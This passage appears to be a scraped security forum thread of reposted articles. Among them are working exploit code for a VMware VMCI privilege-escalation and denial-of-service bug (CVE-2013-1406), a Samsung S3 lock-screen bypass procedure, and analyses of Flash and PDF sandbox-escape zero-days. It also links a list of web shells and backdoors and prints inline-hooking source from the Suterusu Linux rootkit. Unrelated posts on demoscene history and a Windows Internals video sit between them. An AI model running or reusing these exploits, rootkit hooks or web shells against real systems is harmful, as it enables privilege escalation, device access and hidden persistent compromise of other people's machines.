CloseHandle(hVMCIDevice); return; } InitFakeBuf(pShellSprayBufStd, 0x2000000); InitFakeBuf(pShellSprayBufQtd, 0x2000000); InitFakeBuf(pShellSprayBufStd7, 0x2000000); InitFakeBuf(pShellSprayBufQtd7, 0x2000000); PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000); PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000); if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE) { SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST); } PoolSpray(); if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE) { printf("\t[!] If you don't see any BSOD, you're successful\n"); if (b7 || b8) { ResumeThread(hSuspThread); } } else { printf("[-] Not this time %d\n", GetLastError()); } if (pShellSprayBufStd != NULL) { VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE); } if (pShellSprayBufQtd != NULL) { VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE); } } SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL); CloseHandle(hVMCIDevice); } else { printf("[-] Like I don't see vmware here\n"); } CloseHandle(hProcessToElevate); return; } References [1] Tarjei Mandt. Kernel Pool Exploitation on Windows 7. Black Hat DC, 2011 [2] Nikita Tarakanov. Kernel Pool Overflow from Windows XP to Windows 8. ZeroNights, 2011 [3] Kostya Kortchinsky. Real world kernel pool exploitation. SyScan, 2008 [4] SoBeIt. How to exploit Windows kernel memory pool. X’con, 2005 ? Video Demonstration: Author: Artem Shishkin, Positive Research. Sursa: Positive Research Center: Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406
  17. How Scary Can An Old-School Programmer Be? March 5, 2013 Tyler Durden Recently Eugene Kaspersky wrote in his blog a post about the so called Big Comeback of old-school virus writers. I am old enough to remember those guys and their brilliant work – I don’t necessarily mean malware creators, I’m talking about programmers, coders and assembler masters. They are like Jedi and the Sith of Old Empire whom all Skywalker-related saga heroes considered much more powerful and skilled with the light sabers (no kiddin’, ask Yoda). And I thought… damn… there are probably around 3 people left out there who witnessed the true power of those people (me, Kaspersky and Bill Gates). Seriously – it is quite hard to understand what an old school hacker is capable of – I decided to show you what Eugene was talking about, so you could decide for yourself whether this was scary news. Extreme workout for stupid calculators Back in 1992 computers were basically smart calculators with big screens (this is not a joke, kids). But there were several groups of enthusiasts who were happy to face software challenges: some programmers managed to create codes that used every byte of memory, every processor function and register, every OS command and, what is most important, 100% of hardware power – squeezed it all to the last drop and checked out the result. I have to point out that in order to truly nail those tasks, one has to be damn creative, drink a lot of coffee (or smoke a lot of weed, let’s be honest) – and have an insane IQ level. The movement itself started around 1988, basically, together with first more or less widely spread version of MS-DOS. It had no official name, but according to the laws of evolution, sooner or later they’d have to compete. And this is how “Assembly” was born in 1992. Future Crew is back from the future In 1992 a group of Scandinavian coders called “Future Crew” together with their friends from “Complex” and “Amiga” programming groups organized an event called “The Assembly” in order to share the results of their kick-ass work on Assembler language and compete for the title of the Best Coder of the year. There were several disciplines, but two most interesting are platform (PC, Amiga, C64) demos and PC 64k. The first had the goal of demonstrating the most elegant coding solutions/best abilities of the hardware with minimalistic and optimal code. The second was a tricky one – coders were limited to 64kb – their compiled programs (means – read2work file(s)) could not be more than 64kilobytes – that’s why this nomination turned out to be a contest of codin’ elegance. A coding demo is basically a scripted serie of events programmed to demonstrate the capabilities of hardware or/and top software solutions for a particular task, such as complex physics calculations” Back in 1992 the Future Crew won the competition with their “Unreal” demo. Here it is (note that this is 1992 and there’s no Windows yet. This demo was called Unreal for a reason – nobody(!) performed anything like that before): They were the first to demonstrate a 3D environment working model, layers of graphics, complex physics and lighting calculations, etc. And the whole compile code was about 1 megabyte (including music! – and let me point out that there were no mp3 compressions yet). The only way to achieve such a result was mastering Assembler – to my opinion – the most complex programming languages ever. Just so you have an idea of what Assembler is, here is what guys from Future Crew told me years ago: Learning to code demos is a long and very very difficult process. It takes years to learn to code demos very well. A good way to start is some high level language like Pascal or C and then started to experiment with assembler. It takes a lot of time and experimenting to get better, and there are no shortcuts. The main thing is trying to understand what you do, then trying to change the program to see what you get, and gain wisdom in what’s the best way of doing things. Learning to code well requires a lot of patience, a lot of enthusiasm and a lot of time. It is not easy. Basically those who were engaged in the competition turned out to become The Ultimate Source of inspiration for all the software developers. I’m not saying that someone was stealing their ideas, no – everyone was just… adopting their creative vision. Most products we have today – ALL GAMES, Adobe graphics and video products, meteo and GPS, Google Earth… all of those multibillion dollar products were inspired by Assembly at certain point. (BTW – filming and photo shooting are strictly forbidden inside the event’s room – violators are banned forever). 1993 – the year of “Second Reality” and Eclipse The Assembly turned out to be such a success that next year the number of attendants and presented demos doubled (the trend was pretty constant, as since 1999 the Assembly takes place in the biggest football area in Helsinki (Finland) that fits ~5000 attendants from all the globe). In 1993 Future Crew presented something… fantastic, something that set the quality bar for all further contests and changed the programming world forever – the Second Reality demo: It is essential to understand, that this demo was created BEFORE Intel presented their Pentium processors (Intel announced it 22 of march and first Pentiuim-PC’s were shipped only in 1994, and Assembly usually takes place in Summer – Juli/August. It means that Future Crew showed it at least half a year before shipments of Pentium started). It means that all those fantastic graphics and sounds were available on x486 CPUs with primitive sound blasters and NO-graphic cards. This demo blew away the jury and the coding community – it showed what results could be achieved with pro-level Assembler work and minimalistic approach (compiled code of Second Reality was about 1,5 megabytes). This year made Future Crew world famous. This is a video of “Behind the scenes” of Future crew – when they were working on Second Reality: In 1994, the demo “Verses” (by EMC group) won the first pace. Basically, they showed the world that realistic water physics calculations can be done and any morphing of 3D objects within Pentium speed limit is a piece of cake: And this 64kb winner – “Airframe” by Prime group is the mother and father of All modern 3D aviation and space simulators: Just so you get an idea of how quickly the code evolved, here’s a list of all winners from 1995 to 2012. 1995 Assembly Winner: “Stars” by NoooN group 1996 Assembly Winner: “Machines of Madness” by Dubius group 1997 Assembly Winner: “Boost” by Doomsday group 1998 Assembly Winner: “Gateways” by Trauma group http://www.youtube.com/watch?feature=player_embedded&v=QgGmbqIqX_A By the way – this is the ancestor of World of Warcraft visual realisation. This is when the 3D MMORPG visuals were created. In 1999 the 3DFX technology changed the graphics forever. And the demo by MatureFunk group called “Virhe” blew everybody’s minds away: PD11F4A8B45A34E3BAssembly revised In 2000 the rules changed a bit – instead of competing in 3 categories – Amiga, PC and C64 they started to compete in “Combined Demo”, “Oldschool demo” and “64kb limit intro” categories. 64k competition became obsolete in 2010. But in the end of this post you’ll see some really fantastic examples of what a pro assembler coder can fit within 64 kilobytes. This is the list of winners in Combined Demo category, which is the most brilliant in terms of Assembler mastery: 2000 first prize winner was “Spot” by Exceed group Check out the lighting effects… they are amazing – remember – this is 13 years ago technologies! 2001 Assembly Winner was “Lapsuus” by Maturefurk group 2002 Assembly winner was “Liquid… Wen?” by Haujobb group http://www.youtube.com/watch?feature=player_embedded&v=Ae8UK9mscWg I have to pinpoint the fact that all graphics, including faces and characters in all demos of Assembly are drawn ONLY using the code – those are not picture-files included in the demo. No, sir! 2003 Assembly Winner was “Legomania” by Doomsday. Say hello to All 3d console games:) And, I’m sure that this is the time when new Nintendo Wii vision was born: http://www.youtube.com/watch?feature=player_embedded&v=gU70QGtkUm0 2004 first prise went to “Obsoleet” by Unreal Voodoo http://www.youtube.com/watch?feature=player_embedded&v=MUWskk0k6XU 2005 first prize of Assembly went to “Lconoclast” by ASD group: http://www.youtube.com/watch?feature=player_embedded&v=CAKMa8-LA9w In 2006 the demo “Starstuck” by The Black Lotus coding group blasted the community again, but he level of sophistication of graphic coding. I’d say that they raise the bar a lot: http://www.youtube.com/watch?feature=player_embedded&v=-wtMEBPWeMo 2007 winner of Assembly was “LifeForce” by ASD. And this was, once again, a pice of fantastic Assembler work: http://www.youtube.com/watch?feature=player_embedded&v=PDWGLLJLLLk 2008 was the ear of “Within Epsilon” by Pyrotech: http://www.youtube.com/watch?feature=player_embedded&v=4YvYnHvhI_E 2009 winner is one of my personal favourites – “Frameranger” by Fairlight, CNCD & Orange groups: http://www.youtube.com/watch?feature=player_embedded&v=luhHghCAEaQ In 2010 “Happiness is right around the bend” by ASD showed a fantastic tank http://www.youtube.com/watch?feature=player_embedded&v=z8wfYd9Y-_4 2011 Assembly winner was “Spin” by ASD: http://www.youtube.com/watch?feature=player_embedded&v=T_U3Zdv8to8 2012 was phenomenal – “Spacecut” by Carillon & Cyberiad CNCD http://www.youtube.com/watch?feature=player_embedded&v=eJF-kdutNxs 64 kilobytes limit best examples Just so you get an idea what a professional programmer can do within 64 kilobites: this is the best of 2005 – “Che Guevara” by Fairlight http://www.youtube.com/watch?feature=player_embedded&v=bG-6PbGKzcE I repeat – this is 64 kilobytes of assembler code. Not a byte more. But 3 years later, in 2008, the same group demonstrated an immense progress in technology and managed to fit within 64kb a demo like this one – “Panic room” - and won the first prize in this category: http://www.youtube.com/watch?feature=player_embedded&v=MQZ1qGENxP8 But the best 64k demo EVER presented, was “X marks the spot” by portal process in 2010 – first prize winner of Asselbly in 64k category: http://www.youtube.com/watch?feature=player_embedded&v=OhAx2c0U5WA And now… let me draw you a small picture here… All those demos, especially limited to 64kb length, show the results a talented old-school programmer can deliver when he puts his mind into it, but, what is more important, when he is a Master of Assembler – something that is not very common nowadays, when most products are created within Visual so called “high-level” programming languages, such as Visual C and Object C. Just imagine for a second, that a programmer like this, or a group like Future Crew decides to screw all the 3D creative, music, phycisc and just get read of all this enthusiasm and focus on just one goal – create a small code that steals your financial data or helps to re-calibrate a Nuclear Reactor. How do you think, would they succeed? How long would be the code if 64kilobytes is more than enough? Would they find a way to break the Windows or Apple integrated security systems? Are they mobile? Are they flexible? Do they have finances to make this true if they were doing a free 5000-attendee events for 20 years? I don’t want to tell you the answer. You have to decide for yourself. But when I hear someone saying – “My PC does not require protection” – I can’t help but remember the “Second reality” and start praying. Thank God that guys that were Future Crew are now very busy if you’re the best in coding the demos, why not to make it your business, right? Next time you run a 3DMark 2011 test on your PC – think of Unreal, Second Reality and Future Crew. Future Crew as a team did not release anything after Scream Tracker 3 (December 1994). While it was never officially dissolved, its members parted ways in the second half of the 1990s. Companies like Futuremark (3DMark), Remedy (Death Rally, Max Payne, Alan Wake), Bugbear Entertainment (FlatOut, Glimmerati, Rally Trophy), Bitboys (a graphics hardware company) and Recoil Games (Rochard) were all started in whole or in part by members of Future Crew. I want to thank all of them – they changed the world forever and showed us that everything is possible if you put your mind into it. Including Kaspersky Internet Security. Thank you for your inspiration, guys. And deep inside of my head I hope that not a single programmer, who was part of The Assembly would ever use his/her skills for evil purposes. Sursa: How Scary Can An Old-School Programmer Could Be?
  18. Samsung S3 Full Lock Screen Bypass Authored by Sean McMillan The Samsung S3 suffers from a full locked screen bypass vulnerability that leverages the emergency call functionality. ====Title==== Samsung S3 : Full Lock Screen Bypass ========Summary======== It is possible to bypass the lock screen on the S3 allowing an indivdual full access to the phones features ==============Steps to recreate============== 1) On the code entry screen press Emergency Call2) Then press Emergency Contacts3) Press the Home button once4) Just after pressing the Home button press the power button quickly5) If successful, pressing the power button again will bring you to the S3's home screen =====Notes===== 1) It can take quite a few attempts to get this working, sometimes this method works straight away, other times it can take more than 20 attempts. 2) The method has been tested on 3 S3's 3) The method also seems to work better when the mobile has auto rotation on. ================Tested phone details================ Model number: GT-I9300Android Version: 4.1.2Kernal version: 3.031-742798 Sursa: Samsung S3 Full Lock Screen Bypass ? Packet Storm
  19. Adobe Flash Zero-Day Attack Uses Advanced Exploitation Technique Monday, February 11, 2013 at 3:31pm by Archive and Haifei Li On February 7, Adobe issued a security bulletin warning of zero-day attacks that leverage two Flash vulnerabilities. One (CVE-2013-0634) is related to ActionScript regular expression handling. (Some sources refer to this vulnerability as CVE-2013-0633. We are waiting for Adobe to confirm the proper CVE ID.) McAfee Labs rapidly responded to the threat. While digging in depth into the original sample, we found that the exploit uses highly sophisticated exploitation techniques to attack various Flash Player versions. It also includes “user-friendly” tricks that give no signs or symptoms to its victims. The ingenious exploit uses a previously unknown technique to craft the heap memory on Flash Player. With the aid of a regular expression-handling vulnerability that is related to a heap-based buffer overflow, the attack can create a highly reliable memory information leak that allows the exploit to bypass the usually effective exploitation mitigations of address space layout randomization (ASLR) and data execution prevention (DEP) on Windows 7 and other versions. More important, the technique looks like a common exploitation approach to Flash Player. The vulnerability actually doesn’t help much–just overwriting few bytes that are considered as a field of “element number” for a specific ActionScript object. These traits show that the exploitation technique is not limited to this particular Flash vulnerability; it may apply to other Flash or non-Flash vulnerabilities. McAfee Labs has learned the full details of this exploitation technique, and plan to publish our analysis in the near future. Watch this space for updates. At this moment, considering the dangerousness of the attack, we strongly recommend that all users update their Flash Players. The official patch is available here. Though the patch doesn’t kill all exploitation techniques, it will keep systems immune to the current exploits in the wild. For McAfee customers, various protections are provided. We have released signature “0x402df600_HTTP_Adobe_Flash_Player_CFF_Heap_Overflow_Remote_Code_Execution” for the exploits related to CVE-2013-0633 and “0x402df700_HTTP_Adobe_Flash_Player_ActionScript_Buffer_Overflow_Remote_Code_Execution” for CVE-2013-0634 for the Network Security Platform appliances. Also, the generic buffer overflow prevention feature on our HIPS products will stop the related attacks. Thanks to Bing Sun, Xiaobo Chen, and Chong Xu for their help with this analysis. Analyzing the First ROP-Only, Sandbox-Escaping PDF Exploit Friday, February 15, 2013 at 4:05pm by Xiao Chen The winter of 2013 seems to be “zero-day” season. Right after my colleague Haifei Li analyzed the powerful Flash zero day last week, Adobe sent a security alert for another zero-day attack targeting the latest (and earlier) versions of Adobe Reader. Unlike Internet Explorer zero-day exploits that we have seen in the past, this Reader zero-day exploit is a fully “weaponized” affair. It contains advanced techniques such as bypassing address-space layout randomization/data-execution prevention by using memory disclosure and a sandbox escape in the broker process. In this blog we will give a brief analysis of the exploitation. The malicious PDF file used in the this exploitation consists mainly of three parts: Highly obfuscated JavaScript code, containing heap-spray data with a return-oriented programming (ROP) payload and the JavaScript code to manipulate Adobe XML Forms Architecture (XFA) objects to trigger the vulnerability A flat-encoded XFA object An encrypted binary stream, which we believe is related to the two dropped DLLs The exploitation has two stages. The first-stage code execution inside the sandboxed process happens in the AcroForm.api module. A vtable pointer will be read from the attacker-controlled heap-spray area and later will be used in the call instruction. This exploit can leak the base-module address of AcroForm.api. The embedded JavaScript code is used to detect the current version of Adobe Reader, and all the ROP payload can be built at runtime. Most important, there is no traditional shellcode at all! All the required shellcode functions are implemented in the ROP code level. That means most emulation-based shellcode-detection techniques will fail in detecting such an exploitation, because those techniques see only a bunch of addresses within a legitimate module. It’s similar to the old iOS jailbreak exploit that can be used to defeat the iOS code-signing enhancement. The ROP shellcode first decrypts an embedded DLL (D.T) in memory and drops it to the AppData\Local\Temp\acrord32_sbx folder. Then, it loads the DLL into the current process. After that, the hijacked thread suspends itself by calling Kernel32!Sleep API. When D.T runs in the sandboxed process, it drops other DLLs (L2P.T, etc.) and is ready to escape the sandbox by exploiting another Adobe vulnerability. The second-stage code execution occurs inside the broker process. The destination of the call instruction can also be controlled by the attacker. The second-stage ROP shellcode is very short. It simply loads the dropped DLL L2P.T and goes into a sleep state. At this point, the exploit has already successfully broken out of the Reader sandbox because the attacker-controlled code (L2P.T) managed to run in the high-privileged broker process. This is the first in-the-wild exploit we have seen that has fully escaped the sandbox. Previously, we had only heard of the possibility of full sandbox escaping at a top hacking competition such as pwn2own. Besides the complicated exploitation portion, this exploit also uses multiple evasion techniques such as highly obfuscated JavaScript, ROP-only shellcode, and multistaged encrypted malware to bypass network and endpoint security detection and protection. After succeeding, the exploit code exits the hijacked process and creates new processes to render a normal PDF file. The exploitation happens in a split second; thus the victim who opens that original malicious PDF file will not observe any abnormal behavior. We will continue our analysis and provide more detail later on the sandbox escape. For now, we strongly recommend that all Reader users enable protected view and disable JavaScript (Edit -> Preferences -> JavaScript -> Uncheck the “Enable Acrobat JavaScript” option) until Adobe releases a patch. For McAfee customers, we have released signature 0x402e0600 “UDS-HTTP: Adobe Reader and Acrobat XFA Component Remote Code Execution” for the Network Security Platform appliances. Also, the generic buffer overflow prevention (Sigs 6013 and 6048) feature on our HIPS product will help to stop related attacks. Thanks to Bing Sun, Chong Xu, and Haifei Li for their help with this analysis. Digging Into the Sandbox-Escape Technique of the Recent PDF Exploit Wednesday, February 20, 2013 at 5:37pm by Xiao Chen As promised in our previous blog entry for the recent Adobe Reader PDF zero-day attack, we now offer more technical details on this Reader “sandbox-escape” plan. In order to help readers understand what’s going on there, we first need to provide some background. Adobe Reader’s Sandbox Architecture The Adobe Reader sandbox consists of two processes: a high-privilege broker process and a sandboxed renderer process; the latter is responsible for rendering the PDF document. Please see Adobe’s ASSET blog for an illustration of the sandbox architecture. The renderer process has restricted read/write access to the file system, registry, and named objects. Most of the native OS API calls will go through the interprocess communication (IPC) mechanism to the broker process. For example, a native API call (CreateFile) originates from the sandbox process and the broker process eventually takes over as a proxy. Actually, the Reader sandbox’s IPC is implemented based on Google Chrome’s IPC shared-memory mechanism. The broker process creates a 2MB shared memory for IPC initialization, the handle of the shared memory is duplicated and transferred to the sandboxed process, and all the communications leverage this shared memory. The API call request from the sandboxed process is stored in an IPC channel buffer (also called CrossCallParams or ActuallCallParams). The structure of the buffer is defined as the following format (from crosscall_params.h): Here are some explanations for the fields: The first 4 bytes, the “tag,” is the opcode for which function is being called “IsOnOut” describes the data type of the “in/out” parameter “Call return” has 52 bytes. It’s a buffer used to fill the returning data from the IPC server. “Params count” indicates the number of the parameters The parameter type/offset/size info indicate the actual parameters The parameter type is an enum type, s defined as follows: Escaping the Sandbox The sandbox escape in this zero-day exploit is due to a heap-based overflow vulnerability that occurs when the broker process handles the call request of the native API “GetClipboardFormatNameW.” The tag id for this API is 0×73. Here is the ActuallCallParams (IPC channel buffer) memory structure for the request in the exploit: As marked by different colors above, the first DWORD is the tag id (0×73), and there are only two parameters for this API call (as indicated by the blue DWORD). The yellow DWORDs are the parameter types: Type 6 means INOUTPTR_TYPE and type 2 means ULONG_TYPE. The red DWORDs are the sizes for these parameters, so the first parameter has 0x9c bytes with the “in/out ptr” type and the second parameter has 4 bytes with the “long” type. Let’s take a look at the definition of the parameters for the GetClipboardFormatNameW API. According to the preceding definition, the GetClipboardFormatNameW call would look like this: GetClipboardFormatNameW(0xc19a, “BBBBBBBBBB……”, 0x9c); At first sight, this function call looks normal, with nothing malicious. Unfortunately, there are two issues that will lead to a heap overflow condition. First, Adobe Reader allocates the heap memory based on “cchMaxCount,” while the correct size should be “cchMaxCount * sizeof(WCHAR)” as this is a Unicode API. In our case, the allocation size is only 0x9c; that is incorrect. Second, the lower-level native API NtUserGetClipboardFormatName() called by GetClipboardFormatNameW() is using cchMaxCount*sizeof(WCHAR) as its “length” parameter when copying a string to the heap buffer. At this point the heap overrun happens! There is a trick to trigger this heap overflow: Just pay attention to the first parameter. From the MSDN description, the parameter “format” is used to retrieve the type of the format. So if we can pass in advance a format ID that requires a longer buffer space, then later when the broker calls the GetClipboardFormatNameW() to retrieve the format, it will trigger the overflow. In this sandbox-escaping exploit, the malware calls RegisterClipboardFormatW() to register a different format name, which is much longer than 0x9c bytes. Finally, an object (vtable) on heap will be overwritten. However, the story is not over yet. In order to achieve reliable exploitation, a heap spray inside the broker process is needed. The attacker did this in a very smart way, he or she leveraged the “HttpSendRequestA” function (tag id 0x5d). See the following dumped memory for this function call request. Because the fourth parameter (lpOptional) has the type VOIDPTR_TYPE (its address and size are highlighted in red) in the exploit, the attacker passes the buffer size 0x0c800000 (the second red section). Because the size is huge, when the IPC server calls ReadProcessMemory API to read the buffer, the broker process’ heap memory will be sprayed with attacker-controlled data at a predictable memory location. The ASLR- and DEP-bypassing part is very easy because the module base addresses of the broker process and the sandboxed process are same. The attacker can directly use the ROP code chain to defeat both ASLR and DEP. Adobe has now released the official patch for these critical vulnerabilities. As always, we strongly suggest that users apply the patch as soon as possible. For McAfee customers, you’ll find our solutions in our previous post. Thanks again to Bing Sun, Chong Xu, and Haifei Li for their help with this analysis. Surse: - Adobe Flash Zero-Day Attack Uses Advanced Exploitation Technique | Blog Central - Analyzing the First ROP-Only, Sandbox-Escaping PDF Exploit | Blog Central - Digging Into the Sandbox-Escape Technique of the Recent PDF Exploit | Blog Central
  20. [h=1]Defrag Tools: #30 - MCTS Windows Internals[/h]By: Larry Larsen, Andrew Richards, Chad Beeder [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 44.9 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 266.6 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 143.6 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 584.8 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 409.9 MB High Quality WMV (PC, Xbox, MCE) In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen review MCP exam 70-660 - MCTS Windows Internals. Resources: MCTS Windows Internals Windows Internals Books Kernrate Poolmon UMDH Timeline: [01:42] - Summary of the exam [03:00] - Windows Internals books [05:50] - Identifying Architectural Components [14:17] - Designing Solutions [21:34] - Monitoring Windows [29:25] - Analyzing User Mode [41:39] - Analyzing Kernel Mode [45:17] - Debugging Windows [48:32] - Good Luck! Sursa: Defrag Tools: #30 - MCTS Windows Internals | Defrag Tools | Channel 9
  21. [h=1]Web Shells for All[/h] I tweeted to ask the twitter peoples about their fav lazy web shells, as well as posted my favs (see content below!): Pentestmonkey’s REVERSE php shell: php-reverse-shell | pentestmonkey b374k-shell (PHP): https://code.google.com/p/b374k-shell/ AJAX Shell: AJAX/PHP Command Shell | Free software downloads at SourceForge.net Weevely Shell: Weevely by epinna The fuzzdb backdoor collection: https://code.google.com/p/fuzzdb/source/browse/#svn%2Ftrunk%2Fweb-backdoors The laudanum set of injectable code: Laudanum / Code / [r25] (thanks @DisK0nn3cT @rubenthijssen) Happy hacking! Sursa: Web Shells for All!
  22. [h=2]VMCI.SYS IOCTL Host and Guest Privilege Elevation (CVE-2013-1406)[/h] Cylance, Inc. Derek Soeder Reported: July 12, 2012 Published: February 8, 2013 [h=4]Affected Vendor[/h] VMware, Inc. [h=4]Affected Environments[/h] The following VMware host product versions are known to be affected: VMware Server 2.0.2 and earlier VMware Workstation 7.0.0 VMware Workstation 7.1.6 and earlier Other versions that support virtual hardware version 7 not tested due to unavailability, but assumed to be affected The following VMware Tools versions are known to be affected: VMware Tools 7.7.6 and earlier (VMware Server 2.0.2 and earlier) VMware Tools 8.0.4 and earlier (VMware ESXi 4.0.0 Update 4 and earlier) VMware Tools 8.1.3 (VMware Workstation 7.0.0) VMware Tools 8.3.7 and earlier (VMware ESXi 4.1.0 Update 1 and earlier) VMware Tools 8.3.12 prior to build-653202 (VMware ESXi 4.1.0 Update 2 prior to Build 659051 (without ESXi410-201204402-BG)) VMware Tools 8.4.9 and earlier (VMware Workstation 7.1.6 and earlier) VMware Tools 8.6.0 (VMware ESXi 5.0.0) Analiza: http://www.cylance.com/labs/advisories/02-08-2013-Advisory.shtml POC: /* This PoC only for version VMCI.SYS 9.0.13.0 */ #include "stdafx.h" #include "windows.h" #define count_massive 0x189 #define ioctl_vmsock 0x8103208C #define integer_overflow_size 0x12492492; int _tmain(int argc, _TCHAR* argv[]) { HANDLE vmci_device; DWORD bytesRet; int inbuf [count_massive]; int outbuf[count_massive]; int size_=count_massive*sizeof(int); printf("**************************************************\r\n"); printf(" [*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n"); printf("**************************************************\r\n"); //opening vmci interface device vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL); if (vmci_device!=INVALID_HANDLE_VALUE) { printf("[+]vmci device opened \r\n"); //prepare input buffer memset(&inbuf,0,size_); //vulnerable to integer overflowing parameter inbuf[4]=integer_overflow_size; printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n"); //Delaying signed with Diablo stamp Sleep(0x29a); Sleep(0x1000); DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL); CloseHandle(vmci_device); } else { printf("[-]Error: Can't open vmci device!\r\n"); } return 0; } Sursa: [C] CVE-2013-1406 PoC DOS exploit - Pastebin.com
  23. Rootkits for JavaScript Environments Ben Adida Harvard University ben adida@harvard.edu Adam Barth UC Berkeley abarth@eecs.berkeley.edu Collin Jackson Stanford University collinj@cs.stanford.edu Abstract A number of commercial cloud-based password managers use bookmarklets to automatically populate and submit login forms. Unfortunately, an attacker web site can maliciously alter the JavaScript environment and, when the login bookmarklet is invoked, steal the user’s passwords. We describe general attack tech- niques for altering a bookmarklet’s JavaScript envi- ronment and apply them to extracting passwords from six commercial password managers. Our proposed solution has been adopted by several of the commercial vendors. Download: http://static.usenix.org/event/woot09/tech/full_papers/adida.pdf
  24. Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM Table of Contents Introduction Function Hooking in Suterusu Function Hooking on x86 Write Protection [*]Function Hooking on ARM Instruction Caching [*]Pros and Cons of Inline Hooking [*]Hiding Processes, Files, and Directories Introduction A number of months ago, I added a new project to the redmine tracker showcasing some code I worked on over the summer (Suterusu - Overview - Redmine). Through my various router persistence and kernel exploitation adventures, I’ve taken a recent interest in Linux kernel rootkits and what makes them tick. I did some searching around mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn’t much to be found in the realm of modern public Linux rootkits. The most prominent results centered around adore-ng, which hasn’t been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx. A lot changes in the kernel from year to year, and I was hoping for something a little more recent. So, like most of my projects, I said “screw it” and opened vim. I’ll write my own rootkit designed to work on modern systems and architectures, and I’ll learn how they work through the act of doing it myself. I’d like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM. There’s a lot to talk about in the way of techniques, design, and implementation, but I’ll start out with some of the basics. Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these. Function Hooking in Suterusu Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors. Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine. This can be observed by examining the following four functions: hijack_start() hijack_pause() hijack_resume() hijack_stop() These functions track hooks through a linked list of sym_hook structs, defined as: struct sym_hook { void *addr; unsigned char o_code[HIJACK_SIZE]; unsigned char n_code[HIJACK_SIZE]; struct list_head list; }; LIST_HEAD(hooked_syms); To fully understand the hooking process, let’s step through some code. Function Hooking on x86 Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the “hook-with” routine: void hijack_start ( void *target, void *new ) { struct sym_hook *sa; unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE]; unsigned long o_cr0; // push $addr; ret memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE); *(unsigned long *)&n_code[1] = (unsigned long)new; memcpy(o_code, target, HIJACK_SIZE); o_cr0 = disable_wp(); memcpy(target, n_code, HIJACK_SIZE); restore_wp(o_cr0); sa = kmalloc(sizeof(*sa), GFP_KERNEL); if ( ! sa ) return; sa->addr = target; memcpy(sa->o_code, o_code, HIJACK_SIZE); memcpy(sa->n_code, n_code, HIJACK_SIZE); list_add(&sa->list, &hooked_syms); } A small-sized shellcode buffer is initialized with a “push dword 0; ret” sequence, of which the pushed value is patched with the pointer of the hook-with function. HIJACK_SIZE number of bytes (equivalent to the size of the shellcode) are copied from the target function and the prologue is then overwritten with the patched shellcode. At this point, all function calls to the target function will redirect to our hook-with function. The final step is to store the target function pointer, original code, and hook code to the linked list of hooks, thus completing the operation. The remaining hijack functions operate on this linked list. hijack_pause() uninstalls the desired hook temporarily: void hijack_pause ( void *target ) { struct sym_hook *sa; list_for_each_entry ( sa, &hooked_syms, list ) if ( target == sa->addr ) { unsigned long o_cr0 = disable_wp(); memcpy(target, sa->o_code, HIJACK_SIZE); restore_wp(o_cr0); } } hijack_resume() reinstalls the hook: void hijack_resume ( void *target ) { struct sym_hook *sa; list_for_each_entry ( sa, &hooked_syms, list ) if ( target == sa->addr ) { unsigned long o_cr0 = disable_wp(); memcpy(target, sa->n_code, HIJACK_SIZE); restore_wp(o_cr0); } } hijack_stop() uninstalls the hook and deletes it from the linked list: void hijack_stop ( void *target ) { struct sym_hook *sa; list_for_each_entry ( sa, &hooked_syms, list ) if ( target == sa->addr ) { unsigned long o_cr0 = disable_wp(); memcpy(target, sa->o_code, HIJACK_SIZE); restore_wp(o_cr0); list_del(&sa->list); kfree(sa); break; } } Write Protection on x86 Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops. This protection may be trivially circumvented however by setting the WP bit in the cr0 register to 0, disabling write protection on the CPU. Wikipedia’s article on control registers confirms this property: [TABLE] [TR] [TH]BIT[/TH] [TH]NAME[/TH] [TH]FULL NAME[/TH] 